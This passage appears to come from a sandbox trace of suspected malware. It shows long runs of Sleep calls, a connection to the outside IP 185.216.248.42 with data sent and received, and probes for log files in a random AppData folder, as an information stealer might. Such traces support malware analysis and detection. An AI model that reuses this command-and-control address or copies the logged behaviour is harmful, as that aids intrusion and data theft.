(dwMilliseconds=0x7d0) [0198.820] Sleep (dwMilliseconds=0x7d0) [0198.822] Sleep (dwMilliseconds=0x7d0) [0198.823] Sleep (dwMilliseconds=0x7d0) [0198.824] Sleep (dwMilliseconds=0x7d0) [0198.826] Sleep (dwMilliseconds=0x7d0) [0198.827] Sleep (dwMilliseconds=0x7d0) [0198.829] Sleep (dwMilliseconds=0x7d0) [0198.831] Sleep (dwMilliseconds=0x7d0) [0198.832] Sleep (dwMilliseconds=0x7d0) [0198.834] Sleep (dwMilliseconds=0x7d0) [0198.835] Sleep (dwMilliseconds=0x7d0) [0198.838] Sleep (dwMilliseconds=0x7d0) [0198.839] Sleep (dwMilliseconds=0x7d0) [0198.842] Sleep (dwMilliseconds=0x7d0) [0198.848] Sleep (dwMilliseconds=0x7d0) [0198.849] Sleep (dwMilliseconds=0x7d0) [0198.850] Sleep (dwMilliseconds=0x7d0) [0198.852] Sleep (dwMilliseconds=0x7d0) [0198.853] Sleep (dwMilliseconds=0x7d0) [0198.855] Sleep (dwMilliseconds=0x7d0) [0198.856] Sleep (dwMilliseconds=0x7d0) [0198.858] Sleep (dwMilliseconds=0x7d0) [0198.859] Sleep (dwMilliseconds=0x7d0) [0198.861] Sleep (dwMilliseconds=0x7d0) [0198.862] Sleep (dwMilliseconds=0x7d0) [0198.864] Sleep (dwMilliseconds=0x7d0) [0198.865] Sleep (dwMilliseconds=0x7d0) [0198.867] Sleep (dwMilliseconds=0x7d0) [0198.868] Sleep (dwMilliseconds=0x7d0) [0198.870] Sleep (dwMilliseconds=0x7d0) [0198.871] Sleep (dwMilliseconds=0x7d0) [0198.873] Sleep (dwMilliseconds=0x7d0) [0198.874] Sleep (dwMilliseconds=0x7d0) [0198.876] Sleep (dwMilliseconds=0x7d0) [0198.878] Sleep (dwMilliseconds=0x7d0) [0198.879] Sleep (dwMilliseconds=0x7d0) [0198.880] Sleep (dwMilliseconds=0x7d0) [0198.882] Sleep (dwMilliseconds=0x7d0) [0198.884] Sleep (dwMilliseconds=0x7d0) [0198.886] Sleep (dwMilliseconds=0x7d0) [0198.888] Sleep (dwMilliseconds=0x7d0) [0198.890] Sleep (dwMilliseconds=0x7d0) [0198.891] Sleep (dwMilliseconds=0x7d0) [0198.893] Sleep (dwMilliseconds=0x7d0) [0198.894] Sleep (dwMilliseconds=0x7d0) [0198.896] Sleep (dwMilliseconds=0x7d0) [0198.898] Sleep (dwMilliseconds=0x7d0) [0198.900] Sleep (dwMilliseconds=0x7d0) [0198.901] Sleep (dwMilliseconds=0x7d0) [0198.903] Sleep (dwMilliseconds=0x7d0) [0198.905] Sleep (dwMilliseconds=0x7d0) [0198.906] Sleep (dwMilliseconds=0x7d0) [0198.907] Sleep (dwMilliseconds=0x7d0) [0198.909] Sleep (dwMilliseconds=0x7d0) [0198.910] Sleep (dwMilliseconds=0x7d0) [0198.912] Sleep (dwMilliseconds=0x7d0) [0198.913] Sleep (dwMilliseconds=0x7d0) [0198.915] Sleep (dwMilliseconds=0x7d0) [0198.916] Sleep (dwMilliseconds=0x7d0) [0198.918] Sleep (dwMilliseconds=0x7d0) [0198.920] Sleep (dwMilliseconds=0x7d0) [0198.921] Sleep (dwMilliseconds=0x7d0) [0198.922] Sleep (dwMilliseconds=0x7d0) [0198.924] Sleep (dwMilliseconds=0x7d0) [0198.925] Sleep (dwMilliseconds=0x7d0) [0198.927] Sleep (dwMilliseconds=0x7d0) [0198.928] Sleep (dwMilliseconds=0x7d0) [0198.930] Sleep (dwMilliseconds=0x7d0) [0198.931] Sleep (dwMilliseconds=0x7d0) [0198.933] Sleep (dwMilliseconds=0x7d0) [0198.935] Sleep (dwMilliseconds=0x7d0) [0198.936] Sleep (dwMilliseconds=0x7d0) [0198.938] Sleep (dwMilliseconds=0x7d0) [0198.939] Sleep (dwMilliseconds=0x7d0) [0198.941] Sleep (dwMilliseconds=0x7d0) [0198.948] Sleep (dwMilliseconds=0x7d0) [0198.950] Sleep (dwMilliseconds=0x7d0) [0198.951] Sleep (dwMilliseconds=0x7d0) [0198.952] Sleep (dwMilliseconds=0x7d0) [0198.960] Sleep (dwMilliseconds=0x7d0) [0198.961] Sleep (dwMilliseconds=0x7d0) [0198.963] Sleep (dwMilliseconds=0x7d0) [0198.964] Sleep (dwMilliseconds=0x7d0) [0198.966] Sleep (dwMilliseconds=0x7d0) [0198.968] Sleep (dwMilliseconds=0x7d0) [0198.969] Sleep (dwMilliseconds=0x7d0) [0198.972] Sleep (dwMilliseconds=0x7d0) [0198.973] Sleep (dwMilliseconds=0x7d0) [0198.974] Sleep (dwMilliseconds=0x7d0) [0198.976] Sleep (dwMilliseconds=0x7d0) [0198.978] Sleep (dwMilliseconds=0x7d0) [0198.979] Sleep (dwMilliseconds=0x7d0) [0198.981] Sleep (dwMilliseconds=0x7d0) [0198.983] Sleep (dwMilliseconds=0x7d0) [0198.984] Sleep (dwMilliseconds=0x7d0) [0198.985] Sleep (dwMilliseconds=0x7d0) [0198.987] Sleep (dwMilliseconds=0x7d0) [0198.988] Sleep (dwMilliseconds=0x7d0) [0198.990] Sleep (dwMilliseconds=0x7d0) [0198.992] Sleep (dwMilliseconds=0x7d0) [0198.997] Sleep (dwMilliseconds=0x7d0) [0199.000] Sleep (dwMilliseconds=0x7d0) [0199.002] Sleep (dwMilliseconds=0x7d0) [0199.003] Sleep (dwMilliseconds=0x7d0) [0199.005] Sleep (dwMilliseconds=0x7d0) [0199.006] Sleep (dwMilliseconds=0x7d0) [0199.008] Sleep (dwMilliseconds=0x7d0) [0199.009] Sleep (dwMilliseconds=0x7d0) [0199.011] Sleep (dwMilliseconds=0x7d0) [0199.012] Sleep (dwMilliseconds=0x7d0) [0199.014] Sleep (dwMilliseconds=0x7d0) [0199.016] Sleep (dwMilliseconds=0x7d0) [0199.017] Sleep (dwMilliseconds=0x7d0) [0199.018] Sleep (dwMilliseconds=0x7d0) [0199.020] Sleep (dwMilliseconds=0x7d0) [0199.021] Sleep (dwMilliseconds=0x7d0) [0199.023] Sleep (dwMilliseconds=0x7d0) [0199.024] Sleep (dwMilliseconds=0x7d0) [0199.026] Sleep (dwMilliseconds=0x7d0) [0199.028] Sleep (dwMilliseconds=0x7d0) [0199.029] Sleep (dwMilliseconds=0x7d0) [0199.031] Sleep (dwMilliseconds=0x7d0) [0199.032] Sleep (dwMilliseconds=0x7d0) [0199.033] Sleep (dwMilliseconds=0x7d0) [0199.035] Sleep (dwMilliseconds=0x7d0) [0199.038] Sleep (dwMilliseconds=0x7d0) [0199.040] Sleep (dwMilliseconds=0x7d0) [0199.041] Sleep (dwMilliseconds=0x7d0) [0199.042] Sleep (dwMilliseconds=0x7d0) [0199.044] Sleep (dwMilliseconds=0x7d0) [0199.050] Sleep (dwMilliseconds=0x7d0) [0199.052] Sleep (dwMilliseconds=0x7d0) [0199.053] Sleep (dwMilliseconds=0x7d0) [0199.055] Sleep (dwMilliseconds=0x7d0) [0199.056] Sleep (dwMilliseconds=0x7d0) [0199.058] Sleep (dwMilliseconds=0x7d0) [0199.059] Sleep (dwMilliseconds=0x7d0) [0199.061] Sleep (dwMilliseconds=0x7d0) [0199.062] Sleep (dwMilliseconds=0x7d0) [0199.063] Sleep (dwMilliseconds=0x7d0) [0199.065] Sleep (dwMilliseconds=0x7d0) [0199.066] Sleep (dwMilliseconds=0x7d0) [0199.068] Sleep (dwMilliseconds=0x7d0) [0199.070] Sleep (dwMilliseconds=0x7d0) [0199.072] Sleep (dwMilliseconds=0x7d0) [0199.073] Sleep (dwMilliseconds=0x7d0) [0199.074] Sleep (dwMilliseconds=0x7d0) [0199.076] Sleep (dwMilliseconds=0x7d0) [0199.077] Sleep (dwMilliseconds=0x7d0) [0199.079] Sleep (dwMilliseconds=0x7d0) [0199.080] Sleep (dwMilliseconds=0x7d0) [0199.082] Sleep (dwMilliseconds=0x7d0) [0199.083] Sleep (dwMilliseconds=0x7d0) [0199.085] Sleep (dwMilliseconds=0x7d0) [0199.086] Sleep (dwMilliseconds=0x7d0) [0199.088] Sleep (dwMilliseconds=0x7d0) [0199.089] Sleep (dwMilliseconds=0x7d0) [0199.091] Sleep (dwMilliseconds=0x7d0) [0199.092] Sleep (dwMilliseconds=0x7d0) [0199.094] Sleep (dwMilliseconds=0x7d0) [0199.095] Sleep (dwMilliseconds=0x7d0) [0199.097] Sleep (dwMilliseconds=0x7d0) [0199.098] Sleep (dwMilliseconds=0x7d0) [0199.100] Sleep (dwMilliseconds=0x7d0) [0199.101] Sleep (dwMilliseconds=0x7d0) [0199.103] Sleep (dwMilliseconds=0x7d0) [0199.104] Sleep (dwMilliseconds=0x7d0) [0199.105] Sleep (dwMilliseconds=0x7d0) [0199.107] Sleep (dwMilliseconds=0x7d0) [0199.108] Sleep (dwMilliseconds=0x7d0) [0199.110] Sleep (dwMilliseconds=0x7d0) [0199.111] Sleep (dwMilliseconds=0x7d0) [0199.113] Sleep (dwMilliseconds=0x7d0) [0199.114] Sleep (dwMilliseconds=0x7d0) [0199.116] Sleep (dwMilliseconds=0x7d0) [0199.118] Sleep (dwMilliseconds=0x7d0) [0199.122] Sleep (dwMilliseconds=0x7d0) [0199.123] Sleep (dwMilliseconds=0x7d0) [0199.124] Sleep (dwMilliseconds=0x7d0) [0199.126] Sleep (dwMilliseconds=0x7d0) [0199.127] Sleep (dwMilliseconds=0x7d0) [0199.129] Sleep (dwMilliseconds=0x7d0) [0199.131] Sleep (dwMilliseconds=0x7d0) [0199.132] Sleep (dwMilliseconds=0x7d0) [0199.134] Sleep (dwMilliseconds=0x7d0) [0199.135] Sleep (dwMilliseconds=0x7d0) [0199.136] Sleep (dwMilliseconds=0x7d0) [0199.138] Sleep (dwMilliseconds=0x7d0) [0199.139] Sleep (dwMilliseconds=0x7d0) [0199.141] Sleep (dwMilliseconds=0x7d0) [0199.143] Sleep (dwMilliseconds=0x7d0) [0199.144] Sleep (dwMilliseconds=0x7d0) [0199.146] Sleep (dwMilliseconds=0x7d0) [0199.147] Sleep (dwMilliseconds=0x7d0) [0199.149] Sleep (dwMilliseconds=0x7d0) [0199.151] Sleep (dwMilliseconds=0x7d0) [0199.152] Sleep (dwMilliseconds=0x7d0) [0199.153] Sleep (dwMilliseconds=0x7d0) [0199.155] Sleep (dwMilliseconds=0x7d0) [0199.156] Sleep (dwMilliseconds=0x7d0) [0199.158] Sleep (dwMilliseconds=0x7d0) [0199.159] Sleep (dwMilliseconds=0x7d0) [0199.161] Sleep (dwMilliseconds=0x7d0) [0199.163] Sleep (dwMilliseconds=0x7d0) [0199.164] Sleep (dwMilliseconds=0x7d0) [0199.165] Sleep (dwMilliseconds=0x7d0) [0199.167] Sleep (dwMilliseconds=0x7d0) [0199.168] Sleep (dwMilliseconds=0x7d0) [0199.170] Sleep (dwMilliseconds=0x7d0) [0199.171] Sleep (dwMilliseconds=0x7d0) [0199.173] Sleep (dwMilliseconds=0x7d0) [0199.174] Sleep (dwMilliseconds=0x7d0) [0199.176] Sleep (dwMilliseconds=0x7d0) [0199.177] Sleep (dwMilliseconds=0x7d0) [0199.179] Sleep (dwMilliseconds=0x7d0) [0199.181] Sleep (dwMilliseconds=0x7d0) [0199.182] Sleep (dwMilliseconds=0x7d0) [0199.196] Sleep (dwMilliseconds=0x7d0) [0199.197] Sleep (dwMilliseconds=0x7d0) [0199.199] Sleep (dwMilliseconds=0x7d0) [0199.200] Sleep (dwMilliseconds=0x7d0) [0199.202] Sleep (dwMilliseconds=0x7d0) [0199.203] Sleep (dwMilliseconds=0x7d0) [0199.205] Sleep (dwMilliseconds=0x7d0) [0199.206] Sleep (dwMilliseconds=0x7d0) [0199.208] Sleep (dwMilliseconds=0x7d0) [0199.209] Sleep (dwMilliseconds=0x7d0) [0199.211] Sleep (dwMilliseconds=0x7d0) [0199.212] Sleep (dwMilliseconds=0x7d0) [0199.214] Sleep (dwMilliseconds=0x7d0) [0199.215] Sleep (dwMilliseconds=0x7d0) [0199.217] Sleep (dwMilliseconds=0x7d0) [0199.218] Sleep (dwMilliseconds=0x7d0) [0199.220] Sleep (dwMilliseconds=0x7d0) [0199.221] Sleep (dwMilliseconds=0x7d0) [0199.223] Sleep (dwMilliseconds=0x7d0) [0199.224] Sleep (dwMilliseconds=0x7d0) [0199.226] Sleep (dwMilliseconds=0x7d0) [0199.229] Sleep (dwMilliseconds=0x7d0) [0199.230] Sleep (dwMilliseconds=0x7d0) [0199.232] Sleep (dwMilliseconds=0x7d0) [0199.233] Sleep (dwMilliseconds=0x7d0) [0199.235] Sleep (dwMilliseconds=0x7d0) [0199.236] Sleep (dwMilliseconds=0x7d0) [0199.238] Sleep (dwMilliseconds=0x7d0) [0199.240] Sleep (dwMilliseconds=0x7d0) [0199.241] Sleep (dwMilliseconds=0x7d0) [0199.243] Sleep (dwMilliseconds=0x7d0) [0199.244] Sleep (dwMilliseconds=0x7d0) [0199.246] Sleep (dwMilliseconds=0x7d0) [0199.247] Sleep (dwMilliseconds=0x7d0) [0199.249] Sleep (dwMilliseconds=0x7d0) [0199.250] Sleep (dwMilliseconds=0x7d0) [0199.252] Sleep (dwMilliseconds=0x7d0) [0199.253] Sleep (dwMilliseconds=0x7d0) [0199.255] Sleep (dwMilliseconds=0x7d0) [0199.256] Sleep (dwMilliseconds=0x7d0) [0199.258] Sleep (dwMilliseconds=0x7d0) [0199.259] Sleep (dwMilliseconds=0x7d0) [0199.261] Sleep (dwMilliseconds=0x7d0) [0199.262] Sleep (dwMilliseconds=0x7d0) [0199.264] Sleep (dwMilliseconds=0x7d0) [0199.265] Sleep (dwMilliseconds=0x7d0) [0199.267] Sleep (dwMilliseconds=0x7d0) [0199.268] Sleep (dwMilliseconds=0x7d0) [0199.270] Sleep (dwMilliseconds=0x7d0) [0199.271] Sleep (dwMilliseconds=0x7d0) [0199.273] Sleep (dwMilliseconds=0x7d0) [0199.274] Sleep (dwMilliseconds=0x7d0) [0199.276] Sleep (dwMilliseconds=0x7d0) [0199.277] Sleep (dwMilliseconds=0x7d0) [0199.279] Sleep (dwMilliseconds=0x7d0) [0199.280] Sleep (dwMilliseconds=0x7d0) [0199.282] Sleep (dwMilliseconds=0x7d0) [0199.283] Sleep (dwMilliseconds=0x7d0) [0199.285] Sleep (dwMilliseconds=0x7d0) [0199.286] Sleep (dwMilliseconds=0x7d0) [0199.288] Sleep (dwMilliseconds=0x7d0) [0199.289] Sleep (dwMilliseconds=0x7d0) [0199.291] Sleep (dwMilliseconds=0x7d0) [0199.292] Sleep (dwMilliseconds=0x7d0) [0199.294] Sleep (dwMilliseconds=0x7d0) [0199.295] Sleep (dwMilliseconds=0x7d0) [0199.297] Sleep (dwMilliseconds=0x7d0) [0199.298] Sleep (dwMilliseconds=0x7d0) [0199.300] Sleep (dwMilliseconds=0x7d0) [0199.301] Sleep (dwMilliseconds=0x7d0) [0199.303] Sleep (dwMilliseconds=0x7d0) [0199.304] Sleep (dwMilliseconds=0x7d0) [0199.306] Sleep (dwMilliseconds=0x7d0) [0199.307] Sleep (dwMilliseconds=0x7d0) [0199.309] Sleep (dwMilliseconds=0x7d0) [0199.310] Sleep (dwMilliseconds=0x7d0) [0199.312] Sleep (dwMilliseconds=0x7d0) [0199.313] Sleep (dwMilliseconds=0x7d0) [0199.315] Sleep (dwMilliseconds=0x7d0) [0199.317] Sleep (dwMilliseconds=0x7d0) [0199.318] Sleep (dwMilliseconds=0x7d0) [0199.320] Sleep (dwMilliseconds=0x7d0) [0199.321] Sleep (dwMilliseconds=0x7d0) [0199.323] Sleep (dwMilliseconds=0x7d0) [0199.324] Sleep (dwMilliseconds=0x7d0) [0199.326] Sleep (dwMilliseconds=0x7d0) [0199.327] Sleep (dwMilliseconds=0x7d0) [0199.329] Sleep (dwMilliseconds=0x7d0) [0199.330] Sleep (dwMilliseconds=0x7d0) [0199.332] Sleep (dwMilliseconds=0x7d0) [0199.333] Sleep (dwMilliseconds=0x7d0) [0199.335] Sleep (dwMilliseconds=0x7d0) [0199.336] Sleep (dwMilliseconds=0x7d0) [0199.339] Sleep (dwMilliseconds=0x7d0) [0199.340] Sleep (dwMilliseconds=0x7d0) [0199.342] Sleep (dwMilliseconds=0x7d0) [0199.343] Sleep (dwMilliseconds=0x7d0) [0199.345] Sleep (dwMilliseconds=0x7d0) [0199.346] Sleep (dwMilliseconds=0x7d0) [0199.349] Sleep (dwMilliseconds=0x7d0) [0199.350] Sleep (dwMilliseconds=0x7d0) [0199.352] socket (af=2, type=1, protocol=6) returned 0x268c [0199.352] connect (s=0x268c, name=0x88843a0*(sa_family=2, sin_port=0x50, sin_addr="185.216.248.42"), namelen=16) returned 0 [0199.613] send (s=0x268c, buf=0xa10808a*, len=158, flags=0) returned 158 [0199.613] setsockopt (s=0x268c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0199.614] recv (in: s=0x268c, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 485 [0199.891] closesocket (s=0x268c) returned 0 [0199.892] Sleep (dwMilliseconds=0x7d0) [0199.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.894] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.894] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0199.894] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b7c0) returned 1 [0199.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.894] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.894] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.894] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892af50) returned 1 [0199.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.894] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.894] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.894] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a6e0) returned 1 [0199.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.895] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.895] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0199.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.895] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.895] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0199.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.895] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.895] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0199.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.895] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.895] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0199.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.895] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0199.895] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0199.895] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0199.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 